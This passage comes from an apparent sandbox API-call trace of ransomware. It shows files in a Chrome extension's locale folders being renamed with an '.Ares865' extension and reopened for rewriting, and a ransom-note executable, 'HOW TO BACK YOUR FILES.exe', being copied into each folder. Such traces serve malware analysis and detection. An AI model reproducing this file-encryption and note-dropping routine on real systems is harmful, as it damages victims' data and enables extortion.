lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x826ce6c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e573b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e573b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.422] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.422] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.422] lstrcpyW (in: lpString1=0x2cce51e, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.422] lstrlenW (lpString="messages.json") returned 13 [0101.422] lstrlenW (lpString="Ares865") returned 7 [0101.422] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.422] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json.Ares865") returned 164 [0101.422] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.424] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.424] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=617) returned 1 [0101.427] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el" [0101.427] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el" [0101.427] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.427] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.428] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.428] GetLastError () returned 0x0 [0101.428] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.428] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x826c2370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e599c80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e599c80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.428] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.428] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.428] lstrcpyW (in: lpString1=0x2cce51e, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.428] lstrlenW (lpString="messages.json") returned 13 [0101.428] lstrlenW (lpString="Ares865") returned 7 [0101.429] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.429] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json.Ares865") returned 164 [0101.429] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.430] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.430] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=875) returned 1 [0101.433] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de" [0101.433] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de" [0101.433] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.433] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.434] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.434] GetLastError () returned 0x0 [0101.434] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.434] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x826b8730, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e599c80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e599c80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.434] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.434] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.435] lstrcpyW (in: lpString1=0x2cce51e, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.435] lstrlenW (lpString="messages.json") returned 13 [0101.435] lstrlenW (lpString="Ares865") returned 7 [0101.435] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.435] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json.Ares865") returned 164 [0101.435] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.436] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.437] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=701) returned 1 [0101.439] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da" [0101.439] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da" [0101.439] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.439] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.440] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.440] GetLastError () returned 0x0 [0101.440] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.440] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x826ac3e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e5bfde0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e5bfde0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.440] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.440] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.441] lstrcpyW (in: lpString1=0x2cce51e, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.441] lstrlenW (lpString="messages.json") returned 13 [0101.441] lstrlenW (lpString="Ares865") returned 7 [0101.441] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.441] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json.Ares865") returned 164 [0101.441] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.442] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.442] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=642) returned 1 [0101.446] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs" [0101.446] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs" [0101.446] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.446] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.447] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.447] GetLastError () returned 0x0 [0101.447] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.447] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x826a0090, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e5bfde0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e5bfde0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.448] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.448] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.448] lstrcpyW (in: lpString1=0x2cce51e, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.448] lstrlenW (lpString="messages.json") returned 13 [0101.448] lstrlenW (lpString="Ares865") returned 7 [0101.448] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.448] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json.Ares865") returned 164 [0101.448] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.449] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.450] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=663) returned 1 [0101.457] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca" [0101.457] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca" [0101.457] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.458] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), 